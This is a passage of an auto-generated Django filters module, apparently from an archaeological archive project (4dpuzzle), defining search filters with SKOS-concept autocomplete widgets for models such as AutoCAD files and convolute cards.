| 35.642105 | 48 | 0.162729 | 457 | 3,386 | 1.188184 | 0.037199 | 0.972376 | 1.21547 | 1.362799 | 0.88582 | 0.867403 | 0.837937 | 0.813996 | 0.734807 | 0.697974 | 0 | 0.360034 | 0.649734 | 3,386 | 94 | 49 | 36.021277 | 0.097808 | 0.006202 | 0 | 0.518987 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012658 | 0 | 0.012658 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
# --- archiv/filters.py (acdh-oeaw/4dpuzzle, MIT) ---
# generated by appcreator
import django_filters
from django import forms
from dal import autocomplete
from vocabs.filters import generous_concept_filter
from vocabs.models import SkosConcept
from . models import (
    Actor,
    ArchaeologicalObject4DPuzzleID,
    ArchaeologicalObjectID,
    ArchiveINF,
    AutoCAD,
    Convolutecards,
    Datenbase,
    Document4DPuzzleID,
    DocumentTypes,
    ExcavationObjectID,
    ExcavationSeasons,
    Fielddrawing,
    Film,
    Finddrawing,
    Findsheets,
    Fotoborndigital,
    Fotosgescannt,
    Fundinventar4DPuzzleID,
    FundinventarInventarnummern,
    FundinventarKonvolutnummern,
    FundinventarMaterialproben,
    FundinventarSteininventar,
    GIS,
    Geophysics,
    Inventorybooks,
    PhasenID,
    Protocols,
    StratenID,
    Tables,
    ThreeDimensionalModel,
    Videos,
    WallpaintingInventory
)
class ActorListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('legacy_id').help_text,
        label=Actor._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('fc_name').help_text,
        label=Actor._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('fc_directory').help_text,
        label=Actor._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('fc_type').help_text,
        label=Actor._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('fc_filename').help_text,
        label=Actor._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('fc_extension').help_text,
        label=Actor._meta.get_field('fc_extension').verbose_name
    )
    name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('name').help_text,
        label=Actor._meta.get_field('name').verbose_name
    )
    drawer_monogram = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('drawer_monogram').help_text,
        label=Actor._meta.get_field('drawer_monogram').verbose_name
    )
    excavation = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('excavation').help_text,
        label=Actor._meta.get_field('excavation').verbose_name
    )
    xx_4dpuzzle = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('xx_4dpuzzle').help_text,
        label=Actor._meta.get_field('xx_4dpuzzle').verbose_name
    )
    year = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Actor._meta.get_field('year').help_text,
        label=Actor._meta.get_field('year').verbose_name
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Actor._meta.get_field('access').help_text,
        label=Actor._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Actor
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'name',
            'drawer_monogram',
            'excavation',
            'xx_4dpuzzle',
            'year',
            'access',
        ]
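Every `CharFilter` above uses `lookup_expr='icontains'`, Django's case-insensitive substring lookup. Outside the ORM, the same matching behaviour can be sketched like this (`icontains_filter` and the sample rows are hypothetical, not part of this app):

```python
def icontains_filter(rows, field, needle):
    """Case-insensitive substring match over dicts, mimicking `icontains`."""
    needle = needle.lower()
    return [row for row in rows if needle in str(row.get(field, "")).lower()]

actors = [{"name": "Anna"}, {"name": "Johann"}]
```

For example, filtering on `"ann"` keeps both rows, while `"jo"` keeps only the second — the same containment semantics the generated FilterSet exposes per field.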
class ArchaeologicalObject4DPuzzleIDListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('legacy_id').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_name').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_directory').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_type').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_filename').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_extension').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_extension').verbose_name
    )
    archaeological_object_4dpuzzle_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_4dpuzzle_id').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_4dpuzzle_id').verbose_name
    )
    archaeological_object_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_comment').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_comment').verbose_name
    )
    position = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('position').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('position').verbose_name
    )
    stratum_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_comment').help_text,
        label=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('digitisation_comment').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('digitisation_comment').verbose_name
)
archaeological_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_type"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_type').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_relative').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_absolute_prepub = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_absolute_prepub"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_absolute_prepub').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_absolute_prepub",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_id"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('phase_id').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ArchaeologicalObject4DPuzzleID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'archaeological_object_4dpuzzle_id',
'archaeological_object_comment',
'excavation_object_id',
'position',
'stratum_comment',
'digitisation_comment',
'archaeological_object_type',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'phase_id',
]


class ArchaeologicalObjectIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('legacy_id').help_text,
label=ArchaeologicalObjectID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_name').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_directory').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_type').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_filename').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('fc_extension').help_text,
label=ArchaeologicalObjectID._meta.get_field('fc_extension').verbose_name
)
archaeological_object_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('archaeological_object_id').help_text,
label=ArchaeologicalObjectID._meta.get_field('archaeological_object_id').verbose_name
)
archaeological_object_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('archaeological_object_comment').help_text,
label=ArchaeologicalObjectID._meta.get_field('archaeological_object_comment').verbose_name
)
position = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('position').help_text,
label=ArchaeologicalObjectID._meta.get_field('position').verbose_name
)
stratum_id_relative = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('stratum_id_relative').help_text,
label=ArchaeologicalObjectID._meta.get_field('stratum_id_relative').verbose_name
)
stratum_id_absolute_prepub = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('stratum_id_absolute_prepub').help_text,
label=ArchaeologicalObjectID._meta.get_field('stratum_id_absolute_prepub').verbose_name
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('stratum_comment').help_text,
label=ArchaeologicalObjectID._meta.get_field('stratum_comment').verbose_name
)
phase_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('phase_id').help_text,
label=ArchaeologicalObjectID._meta.get_field('phase_id').verbose_name
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('relatedto').help_text,
label=ArchaeologicalObjectID._meta.get_field('relatedto').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObjectID._meta.get_field('digitisation_comment').help_text,
label=ArchaeologicalObjectID._meta.get_field('digitisation_comment').verbose_name
)
archaeological_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_type"
),
help_text=ArchaeologicalObjectID._meta.get_field('archaeological_object_type').help_text,
label=ArchaeologicalObjectID._meta.get_field('archaeological_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ArchaeologicalObjectID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'archaeological_object_id',
'archaeological_object_comment',
'excavation_object_id',
'position',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'stratum_comment',
'phase_id',
'corresponding_to_archaeological_object_id',
'relatedto',
'digitisation_comment',
'archaeological_object_type',
]


class ArchiveINFListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('legacy_id').help_text,
label=ArchiveINF._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_name').help_text,
label=ArchiveINF._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_directory').help_text,
label=ArchiveINF._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_type').help_text,
label=ArchiveINF._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_filename').help_text,
label=ArchiveINF._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('fc_extension').help_text,
label=ArchiveINF._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('filename').help_text,
label=ArchiveINF._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('document_id').help_text,
label=ArchiveINF._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('document_title').help_text,
label=ArchiveINF._meta.get_field('document_title').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('creation_year_original').help_text,
label=ArchiveINF._meta.get_field('creation_year_original').verbose_name
)
comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchiveINF._meta.get_field('comment').help_text,
label=ArchiveINF._meta.get_field('comment').verbose_name
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=ArchiveINF._meta.get_field('file_extension_archivalobject').help_text,
label=ArchiveINF._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=ArchiveINF._meta.get_field('copyright').help_text,
label=ArchiveINF._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=ArchiveINF._meta.get_field('access').help_text,
label=ArchiveINF._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=ArchiveINF._meta.get_field('site_id').help_text,
label=ArchiveINF._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ArchiveINF
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'filename',
'document_id',
'document_title',
'creation_year_original',
'creation_date_archivalobject',
'creation_date_metadata',
'comment',
'document_type',
'relatedto',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
]


class AutoCADListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('legacy_id').help_text,
label=AutoCAD._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_name').help_text,
label=AutoCAD._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_directory').help_text,
label=AutoCAD._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_type').help_text,
label=AutoCAD._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_filename').help_text,
label=AutoCAD._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('fc_extension').help_text,
label=AutoCAD._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('filename').help_text,
label=AutoCAD._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('document_id').help_text,
label=AutoCAD._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('document_title').help_text,
label=AutoCAD._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('path_filename_old').help_text,
label=AutoCAD._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('path_filename_arche').help_text,
label=AutoCAD._meta.get_field('path_filename_arche').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('creation_year_original').help_text,
label=AutoCAD._meta.get_field('creation_year_original').verbose_name
)
relatedto = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('relatedto').help_text,
label=AutoCAD._meta.get_field('relatedto').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('original_comment').help_text,
label=AutoCAD._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=AutoCAD._meta.get_field('digitisation_comment').help_text,
label=AutoCAD._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=AutoCAD._meta.get_field('file_extension_original').help_text,
label=AutoCAD._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=AutoCAD._meta.get_field('file_extension_archivalobject').help_text,
label=AutoCAD._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=AutoCAD._meta.get_field('copyright').help_text,
label=AutoCAD._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=AutoCAD._meta.get_field('access').help_text,
label=AutoCAD._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=AutoCAD._meta.get_field('site_id').help_text,
label=AutoCAD._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=AutoCAD._meta.get_field('excavation_post_excavation').help_text,
label=AutoCAD._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = AutoCAD
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'filename',
'document_id',
'document_title',
'path_filename_old',
'path_filename_arche',
'creation_year_original',
'creation_date_archivalobject',
'creation_date_metadata',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'document_type',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]


class ConvolutecardsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('legacy_id').help_text,
label=Convolutecards._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_name').help_text,
label=Convolutecards._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_directory').help_text,
label=Convolutecards._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_type').help_text,
label=Convolutecards._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_filename').help_text,
label=Convolutecards._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('fc_extension').help_text,
label=Convolutecards._meta.get_field('fc_extension').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('creation_year_original').help_text,
label=Convolutecards._meta.get_field('creation_year_original').verbose_name
)
season = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('season').help_text,
label=Convolutecards._meta.get_field('season').verbose_name
)
filename_document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('filename_document_id').help_text,
label=Convolutecards._meta.get_field('filename_document_id').verbose_name
)
convolute_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('convolute_inventory_number').help_text,
label=Convolutecards._meta.get_field('convolute_inventory_number').verbose_name
)
convolute_subnumber = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('convolute_subnumber').help_text,
label=Convolutecards._meta.get_field('convolute_subnumber').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('filename_old').help_text,
label=Convolutecards._meta.get_field('filename_old').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('storage_folder_original').help_text,
label=Convolutecards._meta.get_field('storage_folder_original').verbose_name
)
month = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('month').help_text,
label=Convolutecards._meta.get_field('month').verbose_name
)
position = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('position').help_text,
label=Convolutecards._meta.get_field('position').verbose_name
)
lowest_height_meters_standard_elevation_zero = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('lowest_height_meters_standard_elevation_zero').help_text,
label=Convolutecards._meta.get_field('lowest_height_meters_standard_elevation_zero').verbose_name
)
maximum_height_meters_standard_elevation_zero = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('maximum_height_meters_standard_elevation_zero').help_text,
label=Convolutecards._meta.get_field('maximum_height_meters_standard_elevation_zero').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('original_comment').help_text,
label=Convolutecards._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Convolutecards._meta.get_field('digitisation_comment').help_text,
label=Convolutecards._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Convolutecards._meta.get_field('file_extension').help_text,
label=Convolutecards._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Convolutecards._meta.get_field('copyright').help_text,
label=Convolutecards._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Convolutecards._meta.get_field('access').help_text,
label=Convolutecards._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Convolutecards._meta.get_field('site_id').help_text,
label=Convolutecards._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Convolutecards._meta.get_field('equipment_scan').help_text,
label=Convolutecards._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
